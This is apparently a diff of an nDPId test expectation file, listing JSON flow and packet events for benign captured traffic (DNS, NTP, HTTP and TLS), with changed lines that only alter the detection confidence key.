00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1626168077670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077670,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGVKLAqAF5AhYh69KZAFBWi1SlxUZcNoAQCAqOZAAAAQEICj3R+SqAXqM6"} -00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} -01001{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App 
Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} +00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077660,"flow_last_seen":1626168077671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1626168077671,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Cloud"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":0,"content_type":"","user_agent":"com.apple.trustd\/2.0"}} +01001{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":88,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1626168077660,"flow_last_seen":1626168077691,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1649,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1626168077691,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"2.22.33.235","src_port":53913,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"6":"DPI"},"proto":"HTTP.Microsoft","breed":"Safe","category":"Download"},"http": {"hostname":"www.microsoft.com","url":"www.microsoft.com\/pkiops\/certs\/MicSecSerCA2011_2011-10-18.crt","code":200,"content_type":"application\/octet-stream","user_agent":"com.apple.trustd\/2.0"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077734,"flow_last_seen":1626168077734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168077734,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1626168077734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077734,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGezbAqAF5jFJxGtKRAbvAP+ze5D7DE4ARCAAudQAAAQEICj3R+WZAyN\/6"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1626168077735,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1626168077735,"pkt":"WNVuaKQA8BiYFWV8CABFAABCGz0AAEARjT3AqAF5CAgICP69ADUALrrFTnABAAABAAAAAAAACnRpbWUtbWFjb3MFYXBwbGUDY29tAAABAAE="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": 
{"query":"time-macos.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1626168077749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":193,"pkt_l4_len":159,"thread_ts_msec":1626168077749,"pkt":"8BiYFWV8WNVuaKQACABFAACzStAAAHkRJDkICAgIwKgBeQA1\/r0An7qJTnCBgAABAAYAAAAACnRpbWUtbWFjb3MFYXBwbGUDY29tAAABAAHADAAFAAEAAAR8ABUIdGltZS1vc3gBZwdhYXBsaW1nwB3AMgABAAEAAANFAAQR\/Tb7wDIAAQABAAADRQAEEf1s\/cAyAAEAAQAAA0UABBH9bH3AMgABAAEAAANFAAQR\/TZ7wDIAAQABAAADRQAEEf02fQ=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168077749,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.54.251"}} 
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168077749,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.54.251"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1626168077750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168077750,"pkt":"WNVuaKQA8BiYFWV8CABFAABMdJwAAEAR+uvAqAF5Ef02+8BAAHsAOBCpIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1626168077780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168077780,"pkt":"8BiYFWV8WNVuaKQACABFAABMU7FAADcR5NYR\/Tb7wKgBeQB7wEAAOB9pJAED6wAAAAAAAAALU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mN1Ssd5+SX2Y3VLRfJ"} 
00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAABTEkpAADAGeM2MUnEawKgBeQG70pHkPsMTwD\/s34AYAEWx6wAAAQEICkDJEb890flmFQMDABpqQiSe8lZWsEgoTupah5UnGMUqJn8V431Q+A=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1626168077848,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1626168077848,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAAA0EktAADAGeOuMUnEawKgBeQG70pHkPsMywD\/s34ARAEUESgAAAQEICkDJEcA90flm"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1626168078653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1626168078653,"pkt":"WNVuaKQA8BiYFWV8CABFAABGLVcAAEARex\/AqAF5CAgICMseADUAMgvmotEBAAABAAAAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAAB"} 
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1626168078654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168078654,"pkt":"WNVuaKQA8BiYFWV8CABFAABITn4AAEARWfbAqAF5CAgICMseADUANKzYlN8BAAABAAAAAAAAAjI2AzExMwI4MgMxNDAHaW4tYWRkcgRhcnBhAAAMAAE="} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078653,"flow_last_seen":1626168078654,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168078654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"26.113.82.140.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078653,"flow_last_seen":1626168078654,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168078654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"26.113.82.140.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2aa\/F4bv+FAQEACuIgAAFwMDCRUAAAAAAAAAWfKHBs70qmO4BAxw\/KH76VJthsd+JmhEdw9LbrjkTjI9b3XfM0DMNLKHxmQFc1wZ9+v47IezDEajRVIeCS0iuwLsGsA3YBgKp65J4M20GnYw3QEoWxPt99213+KI1CclXQzaueofFw\/qIILvmneWSh5sBJstqbtZLD2cDfq2tFoUseLZtuSKYL5M6qSNwvarEAmysHZgT7Udi\/a0Qp07Np4WgFkq\/a9MQH22ift7VaKutQa0mJmP19SdWXTILAVbvhO3J6cdL9EqjePIeIkXKca0uVG2cDnC+ogcIBgWiBVq1pQlzG6pgHKD3PRA0vNoda3MJ0atx621R\/WKvfMZJYbQztqn6MP4oCdEaJloUS59wJjijiLCZEHV1oirlnS2nC0LRIMkV0xOr2eStcvbZVXw4nOKDQS6H4Zgv11KltQC1JnlZF3H2hfUzks7VZJ1piCl7JLEyNiXPboWZlWGmZoEaDAEUa\/zJI4IEULQtYV9J4jBVG0LIyT8dLpi5cgu5HSsaKdQTef+rQO01UnLW77pUjM2FuWnb+vOmbNg9vroOAp08oUd4WURirzl+3HYtCcfBI3wOCJwEWivMjawTzc9kqNg6MLXXDVodJ+9u6ySbjGo8wdF8Ujzicfc0DHPbSwSWwzi48Lx1Xv3zlCdNcfYFQi2USvaYTxC82pbJFTcLcjA75y5d4uDzJFLRDQQPcLYiW1zyuRecgn4v\/HoR\/nQn8q3KO2aunXtZjN2Sgwqa9
bCj+P70uuLOr7LdCSf95Yuvv83BVkjI8LO\/K2GelZusfiw+ph2AM5v3nVCVFtVClMHt5LBbn90AGigLyLssV8usgvMte9WY2YO5RbaLrRuaQaZXq7xKP6I9rbLNl04xmGTkSwgMCnsYgpwvWgoxVEJKIK81LOzdRyjEIzviQKsdu5zYpaTUYn0gMWLbk8gisL6HsaNyyzZRZny4WG9c8rHaQ0AVF7OZHAfugm1G0Ya+4uTEO06lH0Y0luTPeZbk6BzWyTQN4kkdYJgzbQ\/H4fL96wAxDKYsoN4xb\/dNiL+rBxozbwW3E3YDpgsLBHEYXx\/9T+ZZByNcVhoanUoyeZR4La0nznczRNl0BSSAwop3ffF\/3weBpuyebCHd3nQY06YIOyKfw5o\/8+DIvbWrrftOtndpCOAfM8xK0ncs0qGgNDeHWSGhfqOCu4xsd1D6TNFpi+SoFxZbO162qCP1uQZqSIk3sB4T700Vag3Fmr5zAc2+Cy2sdC\/A9S2zr73WQ2tNqbvUTsm7mAOCy6fHXiJfrCMOm070Q3x\/hDA1F\/ri24teJTcz681Tpyzz98or8aBXhC1tirmfRKLeb1za5S0A5FpvCOErLaYZ7JnA2Hcnep7W9VvnkzVZD\/eh5PJxQTtMHNN3t73y3SocpYzsv4jecsMhINyJMQzKIZyFN7BeOFn3Icd72v79IVYW+OEMLTFGr\/z0a3l6KHAUNHg5OrTZy63kxeuj2oqpuTuGGW5OGR1vga0lB9LeT5DNs1fw4ET+3+xHSDQYEpIQCm73rmKpEzHnGvP6PaZFc3upw\/YvkfAML3GBWjg6BeNxYGhLgBq1U7bw1AAqe3KjEtHWznkCRp0j2b1yA1x473SNIk\/Tl0OU2uF4V2zDlzbygL3UGekyceZ9TOivgWvNEFgm3JDyB1JsgPkE1UA9Mb3RcUv6IS4oUKckZLMvYCqsp6JNk+hSM2SSYrjCpjVhAAYR\/Tw9J3qPbVuQ\/+0boJNNW9SXU3FXb1mu6\/UjowIaOU5yd1Ruw2HgKAG+TcnMQdTBDCV1Fn1s2Gos7GgJFmic+wrwQmUwvry3qcM4QfQn+KkqL+DVzAfZpY3UE5kKkQw09tvvvCnUub+fKLuuHs2xshp8SgWsVHUpe\/eGalaURu9E5+S5ef5NZPTZU4="} 
01667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC1Absg2axnF4bv+FAYEAByKgAA8hiRnjTuMaDQEL+CLYj0enfAkHVnXO7nV5IzKiak6sLS6qxgDE4htK9g2bjk3R484+O\/m3LR4RiopAnWolcjfbrpfWVb1lMjRimj35IfoR0InDQcTV+lqM1hnbaRsbPul7kk7yp40mdnMbGeSdokyNlVd+Gc2o9y\/kRGCp\/RqZF8PhlnvFvIilO8yiVaTaBmaNQ2c5Ph9+sPKU5aFL1uQpdr\/lZqIfEq2kVgCrdBeDo4qNeeQzKtJNsLVSSXJNaa5EbU9xA4Gcwa59FEb+z5l5k6kMngz8ZNuAlqyaHzifpWW3O+gJvTHlQKGmobQMi8ii1K+B8azR0rME7gHuYp8j9KIa090V1eZVPAqukxBBhYGnGZkUnr+FDlf1ZK\/6jjt\/FM8rQ\/lbeUUBqVgsa+O\/WxUto3U7xUvYDA5nlmX+JiSIl7TX4qI+Ru0aN0Akmto\/YQCR\/ts7jv1DeYAK5L5Yy2Vh6PLRQ4c+Pa\/92Jj4DNdt3iyKVflpKtt14Zke3huw2c2HHz1srDVPgqGpJqA\/eD7864eDOp49Ft0Yeo1yo62XnCO2MSq34SmUewekOqz3llMeY3SFHNG\/SCIEenKOH+ZLswKCtHaL23XWktzPIAvtiPaUe8OQwJHr\/lbrWuPFkD\/U0II2V8NaPz4AVb17oDlmuZOeHOf8JZ5gjU14hPhQ0t944FAWUouPhqgHpug4J7fVHUyJ1W0HeNumJ7723SardKLRg5P7i3J2r6\/9HqflhjXWWoqO31j\/pyOLWOUftD3uTRP8P11Cr3jlNVHTXBld4hude0v33CDpTR\/mf09FhR1Yz1vcA7zHJhk+Hem4vzglb2dTx3BT6MRYPvgUON